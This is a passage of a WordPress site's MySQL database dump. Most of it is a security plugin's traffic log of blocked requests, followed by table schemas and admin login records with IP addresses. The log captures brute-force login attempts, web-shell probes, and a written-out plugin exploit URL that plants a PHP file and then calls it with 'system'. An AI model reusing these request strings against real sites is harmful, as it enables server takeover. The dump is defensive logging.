Safari\\/537.36\"}','Ni6jS8eUTKlvxJpGoZt3P2Md',0,1675090286.9754,162,'','GET',403,0,700,0,1,'',0),('208.97.181.78',3496064334,'','https://yorkshirecricketboard.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','g6Kde3DzEmP7NkjFLYXI4hUZ',0,1675090287.3950,88,'','POST',403,0,700,0,1,'',0),('208.97.181.78',3496064334,'','https://yorkshirecricketboard.org.uk/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','RO6mZEe8sXU5LdrGgnpuK124',0,1675090287.7236,108,'','GET',403,0,700,0,1,'',0),('208.97.181.78',3496064334,'','https://yorkshirecricketboard.org.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','iCPoScdVvbwM4NGWFpEeLqr6',0,1675090288.1223,93,'','POST',403,0,700,0,1,'',0),('208.97.181.78',3496064334,'','https://yorkshirecricketboard.org.uk/wp-story.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TrkcsnLlMzJjCXouWy5B4Ywg',0,1675090288.4737,109,'','GET',403,0,700,0,1,'',0),('208.97.181.78',3496064334,'','https://yorkshirecricketboard.org.uk/wp-story.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Ql6bVwA2Y9LurgB7DJpzns0H',0,1675090288.8191,95,'','POST',403,0,700,0,1,'',0),('208.97.181.78',3496064334,'','https://yorkshirecricketboard.org.uk/simple.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','pIyYTLJBnHijk8P4lbeCoQWa',0,1675090289.1671,91,'','GET',403,0,700,0,1,'',0),('208.97.181.78',3496064334,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','WLyQp84isrqgDIw5uKdBc2YG',0,1675090289.9404,94,'','GET',403,0,700,0,1,'',0),('208.97.181.78',3496064334,'','https://yorkshirecricketboard.org.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','1NG3KoMv5er0pXiCaWymZV7H',0,1675090290.2801,97,'','GET',403,0,700,0,1,'',0),('104.244.77.229',1760841189,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','cU5HDokG3qY0MQ7sSmvPZwua',0,1675091021.4171,109,'','POST',403,0,600,0,1,'',0),('52.176.65.17',883966225,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','yaYAWZd6n42TVFeiKpQjJDwr',0,1675091756.1990,304,'','POST',403,0,600,0,1,'',0),('207.180.236.22',3484740630,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rJmPsdX8bUokiA9zFW1VBG6M',0,1675092674.9857,146,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','vZLpCwQTcbfDmXjBRoM0tE9O',0,1675094621.4129,150,'','POST',403,0,600,0,1,'',0),('157.245.55.196',2650093508,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','rpm5NaPfcWE7IA9OdgixSze0',0,1675095839.0121,768,'','POST',403,0,600,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','euNTfX1EInMk0pVUdmZPaoc2',0,1675100992.9020,173,'','GET',403,0,700,0,1,'',0),('164.92.120.240',2757523696,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','mtoD8lcu4UPkGEBTirgFKXbv',0,1675102574.4090,283,'','POST',403,0,600,0,1,'',0),('198.98.50.216',3328324312,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','EVUh64RkXy0MdKcTxtvnN37Z',0,1675107453.4235,111,'','POST',403,0,600,0,1,'',0),('188.212.34.69',3168019013,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','BqP7Q4Zr2jSs95IR8ehubcgx',0,1675108290.9171,178,'','POST',403,0,600,0,1,'',0),('209.141.57.60',3515693372,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','ZxjtSEIrdfJeR8UlLNXgoMub',0,1675108738.1579,170,'','POST',403,0,600,0,1,'',0),('54.37.156.240',908434672,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','GHpISOUM1ZWVJLg97m6yYsia',0,1675110878.7720,200,'','POST',403,0,600,0,1,'',0),('175.178.125.173',2947710381,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','6ScJPOxTdfmW1YnAyNCDQwIo',0,1675118683.5449,276,'','POST',403,0,600,0,1,'',0),('157.245.207.53',2650132277,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','I5rB9iqeSHEMKsc1UWAOnZFj',0,1675121055.3983,508,'','POST',403,0,600,0,1,'',0),('47.105.73.13',795429133,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','bR2lmHY4VFDQtw6deUxg8Pro',0,1675128067.4727,271,'','POST',403,0,600,0,1,'',0),('144.126.223.177',2424233905,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','fN5kR2ALGwOo3He80Mx9l6Wa',0,1675130425.1802,161,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit\\/600.1.3 (KHTML, like Gecko) Version\\/8.0 Safari\\/600.1.3\"}','wUecOEfxbaDq8kV7QlpCWZn2',0,1675133611.2999,171,'','POST',403,0,600,0,1,'',0),('51.79.144.41',860852265,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','URqYpXZyo7DdbnGhKJ8WVmzC',0,1675136977.8887,538,'','POST',403,0,600,0,1,'',0),('209.141.52.244',3515692276,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) GSA\\/4.1.0.31802 Mobile\\/11D257 Safari\\/9537.53\"}','bWfl19C2vUgVt8LcnPw37JNj',0,1675140549.6926,151,'','POST',403,0,600,0,1,'',0),('81.88.53.6',1364735238,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','3WplVBvUgbY7o14x5F6wCQcR',0,1675143114.4525,323,'','POST',403,0,600,0,1,'',0),('209.141.47.94',3515690846,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Ubuntu Chromium\\/34.0.1847.116 Chrome\\/34.0.1847.116 Safari\\/537.36\"}','vGqYzSk6KsFDIyw8iJh2dbTZ',0,1675144434.3486,115,'','POST',403,0,600,0,1,'',0),('198.98.50.216',3328324312,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','kWr7YncvpNSBLmPQ5IjUTHKo',0,1675144648.7770,131,'','POST',403,0,600,0,1,'',0),('161.35.52.207',2703439055,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','Iq9QYAVE2diLbyr1ezDHmxfW',0,1675145452.3649,170,'','POST',403,0,600,0,1,'',0),('13.127.205.195',226479555,'','https://yorkshirecricketboard.org.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','4s5gNDCzUtFjkruH20o8EP3x',0,1675147057.5994,99,'','POST',403,0,700,0,1,'',0),('13.127.205.195',226479555,'','https://yorkshirecricketboard.org.uk/qbffppqv.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','8qyungBfIKh4aLiJSxFTtPwE',0,1675147061.4028,146,'','GET',403,0,700,0,1,'',0),('151.106.41.64',2540316992,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','vVHC3kWmLw6naelJM45RdBYx',0,1675148012.3777,310,'','POST',403,0,600,0,1,'',0),('107.189.6.203',1807550155,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/7.0.5 Safari\\/537.77.4\"}','oG0KHFYEkpBuR5yPmWAfeJTc',0,1675154596.7933,158,'','POST',403,0,600,0,1,'',0),('209.141.49.96',3515691360,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','S6KuaQ3GZvjm5LI1pPq0ebsf',0,1675156657.2896,157,'','POST',403,0,600,0,1,'',0),('47.115.24.165',796072101,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','R6SMhy7avxrlJiumGZdfP0gX',0,1675157522.7586,169,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','HgacFY0jxJtsf1deXoAQ2N67',0,1675161358.1401,107,'','POST',403,0,600,0,1,'',0),('145.239.30.120',2448367224,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','f34FakIU5GV9ScHuKzPjogeO',0,1675165909.1522,151,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','gNHQZw6TSM7XdI0ohsmFyACL',0,1675171420.0424,282,'','POST',403,0,600,0,1,'',0),('205.185.113.218',3451482586,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','N2jlP5tfod46x07kUYBvpCWR',0,1675171650.5542,129,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','ouZKHSJ7dyrmkGacDLvfCesO',0,1675173862.6752,146,'','POST',403,0,600,0,1,'',0),('45.61.188.28',759020572,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','E3tbWxfgcRUBoKPpFm6id1Ak',0,1675174450.5772,138,'','POST',403,0,600,0,1,'',0),('205.185.115.239',3451483119,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','N3oVFRnkuZvdtI4E9172YbsJ',0,1675175368.2051,155,'','POST',403,0,600,0,1,'',0),('120.27.133.69',2015069509,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','cSNK8o1WVzP3q2sHODXIFUdy',0,1675175510.3603,199,'','POST',403,0,600,0,1,'',0),('178.128.5.109',2994734445,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','0LktwQNYVGHDCja5Fn3r7sgb',0,1675179090.4449,348,'','POST',403,0,600,0,1,'',0),('107.189.13.99',1807551843,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','dhw7GmNtoXeb30xQP5uCSlU6',0,1675181656.4380,108,'','POST',403,0,600,0,1,'',0),('209.141.38.18',3515688466,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../wp-conf.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/101.0.4951.54 Safari\\/537.36\"}','jhYaSZ4Gd3VEFfkQeBgNbPm2',0,1675181709.8871,106,'','GET',403,0,700,0,1,'',0),('209.141.38.18',3515688466,'','https://yorkshirecricketboard.org.uk/wp-content/wp-conf.php?1=system','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/101.0.4951.54 Safari\\/537.36\"}','CoxbPgwQ0hLduN46fEODSMW8',0,1675181710.3687,135,'','GET',403,0,700,0,1,'',0),('107.189.6.203',1807550155,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','ZU84DLpVKikQ3uzRXMNwj1qf',0,1675182853.7504,128,'','POST',403,0,600,0,1,'',0),('205.185.121.252',3451484668,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','4i7VrWYlqpdOCsj9v1f8aXuo',0,1675184283.2335,152,'','POST',403,0,600,0,1,'',0),('93.114.235.167',1567812519,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','KPcvUSGNF79rdZhnjtuV4y2Q',0,1675187845.4023,110,'','GET',403,0,520,0,1,'',0),('13.127.205.195',226479555,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/\\/wp-content\\/plugins\\/seoplugins\\/mar.php\"}','CWuF51KLvTS2eRZ3cOkgsdmJ',0,1675192696.5870,100,'','GET',403,0,700,0,1,'',0),('13.127.205.195',226479555,'','https://yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/\\/wp-content\\/themes\\/seotheme\\/mar.php\"}','r6Cn32UvdFihPsK81T4LpZ5a',0,1675192701.2641,100,'','GET',403,0,700,0,1,'',0),('205.185.126.99',3451485795,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','fbSV2BNqz4eLMcsFnKxHuyEY',0,1675194339.8903,119,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','fKBtvb6erpVNWyahZnjFczsL',0,1675208745.3855,121,'','POST',403,0,600,0,1,'',0);
/*!40000 ALTER TABLE `cerber_traffic` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_events`
--

DROP TABLE IF EXISTS `wp_aiowps_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_events` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `event_type` varchar(150) NOT NULL DEFAULT '',
  `username` varchar(150) DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `event_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `ip_or_host` varchar(100) DEFAULT NULL,
  `referer_info` varchar(255) DEFAULT NULL,
  `url` varchar(255) DEFAULT NULL,
  `country_code` varchar(50) DEFAULT NULL,
  `event_data` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_events`
--

LOCK TABLES `wp_aiowps_events` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_failed_logins`
--

DROP TABLE IF EXISTS `wp_aiowps_failed_logins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_failed_logins` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `failed_login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_attempt_ip` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_failed_logins`
--

LOCK TABLES `wp_aiowps_failed_logins` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_global_meta`
--

DROP TABLE IF EXISTS `wp_aiowps_global_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_global_meta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date_time` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `meta_key1` varchar(255) NOT NULL,
  `meta_key2` varchar(255) NOT NULL,
  `meta_key3` varchar(255) NOT NULL,
  `meta_key4` varchar(255) NOT NULL,
  `meta_key5` varchar(255) NOT NULL,
  `meta_value1` varchar(255) NOT NULL,
  `meta_value2` text NOT NULL,
  `meta_value3` text NOT NULL,
  `meta_value4` longtext NOT NULL,
  `meta_value5` longtext NOT NULL,
  PRIMARY KEY (`meta_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_global_meta`
--

LOCK TABLES `wp_aiowps_global_meta` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_activity`
--

DROP TABLE IF EXISTS `wp_aiowps_login_activity`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_activity` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `logout_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_ip` varchar(100) NOT NULL DEFAULT '',
  `login_country` varchar(150) NOT NULL DEFAULT '',
  `browser_type` varchar(150) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_activity`
--

LOCK TABLES `wp_aiowps_login_activity` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_activity` DISABLE KEYS */;
INSERT INTO `wp_aiowps_login_activity` VALUES (1,1,'yorkshirecricketboard','2016-12-16 14:42:26','2017-02-07 16:54:49','217.206.184.94','',''),(2,1,'yorkshirecricketboard','2017-02-07 16:54:18','2017-02-07 16:54:49','217.206.184.94','',''),(3,1,'yorkshirecricketboard','2017-03-07 10:24:22','0000-00-00 00:00:00','217.206.184.94','',''),(4,1,'yorkshirecricketboard','2017-07-03 14:07:12','0000-00-00 00:00:00','217.206.184.92','',''),(5,1,'yorkshirecricketboard','2017-10-03 10:14:32','0000-00-00 00:00:00','217.206.184.92','',''),(6,1,'yorkshirecricketboard','2019-02-12 09:12:38','0000-00-00 00:00:00','185.175.113.75','',''),(7,1,'yorkshirecricketboard','2020-10-09 12:08:58','0000-00-00 00:00:00','185.175.113.72','',''),(8,1,'admin','2022-04-11 12:37:09','1000-10-10 10:00:00','185.175.113.72','','');
/*!40000 ALTER TABLE `wp_aiowps_login_activity` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_lockdown`
--

DROP TABLE IF EXISTS `wp_aiowps_login_lockdown`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_lockdown` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `lockdown_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `release_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `failed_login_ip` varchar(100) NOT NULL DEFAULT '',
  `lock_reason` varchar(128) NOT NULL DEFAULT '',
  `unlock_key` varchar(128) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_lockdown`
--

LOCK TABLES `wp_aiowps_login_lockdown` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_permanent_block`
--

DROP TABLE IF EXISTS `wp_aiowps_permanent_block`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_permanent_block` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `blocked_ip` varchar(100) NOT NULL DEFAULT '',
  `block_reason` varchar(128) NOT NULL DEFAULT '',
  `country_origin` varchar(50) NOT NULL DEFAULT '',
  `blocked_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `unblock` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_permanent_block`
--

LOCK TABLES `wp_aiowps_permanent_block` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_files`
--

DROP TABLE IF EXISTS `wp_cerber_files`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
